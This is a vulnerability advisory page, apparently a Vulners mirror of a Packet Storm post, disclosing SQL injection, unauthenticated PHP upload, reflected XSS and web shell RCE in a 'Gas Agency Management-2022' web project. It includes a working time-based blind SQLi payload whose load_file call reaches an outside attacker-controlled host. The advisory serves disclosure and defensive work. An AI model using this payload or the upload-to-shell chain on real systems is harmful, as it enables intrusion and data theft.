Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Gas Agency Management 2022 SQL Injection / XSS / Shell Upload

🗓️ 12 Aug 2022 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 464 Views

Gas Agency Management-2022 by Mayuri K suffers from SQL injection, unauthenticated file upload, XSS, and web shell upload. It requires immediate termination

Code
`## Title: Gas Agency Management-2022 by Mayuri K - SQLi+FU-RCE+XSS  
## Author: nu11secur1ty  
## Date: 08.12.2022  
## Vendor Homepage: https://www.mayurik.com/#download_section  
## Software Link-0:  
https://www.sourcecodester.com/php/15586/gas-agency-management-system-project-php-free-download-source-code.html  
## Software Link-1:  
https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022/Docs/gasmark.zip  
  
  
## Description:  
The Gas Agency Management-2022 by Mayuri K suffers from multiple  
vulnerabilities, which means this project must be deprecated  
immediately!  
  
1. - SQLi: the parameter username is vulnerable to time-based blind  
(query SLEEP) injection - not sanitizing well.  
2. - Unauthenticated file upload - not sanitizing upload function -  
possible to upload .php extension files on photo section, for the  
customers.  
3. - XSS-reflected in the section adds customer in address function.  
4. - Web shell file upload - unauthenticated extension file upload, in  
this case, is PHP web shell uploader. After this, the malicious user  
can execute the already uploaded file remotely, and he can destroy  
completely this flawed system.  
5. - STATUS: For termination of the project.  
  
[+]Payloads:  
  
```mysql  
---  
Parameter: username (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: username=mxiusQzi'+(select  
load_file('\\\\alzg6yrkl2xieezgaz9zqnya91fu3lw9ncb4yumj.tupaciganka.com\\jfe'))+''  
AND (SELECT 9964 FROM (SELECT(SLEEP(5)))bVfa)--  
FygL&password=r8H!r2a!U2&login=  
---  
```  
[+]Unauthenticated Upload:  
- - - in the video:https://streamable.com/opqz3n  
  
[+]XSS-Reflected:  
- - - in the video:https://streamable.com/opqz3n  
  
[+]RCE:  
- - - in the video:https://streamable.com/opqz3n  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Gas-Agency-Management-2022)  
  
## Proof and Exploit:  
[href](https://streamable.com/opqz3n)  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html and https://www.exploit-db.com/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Aug 2022 00:00Current
0.8Low risk
Vulners AI Score0.8
gas agency managementmayuri ksql injectionunauthenticated file uploadxssweb shell uploadterminationvulnerabilitydeprecated
464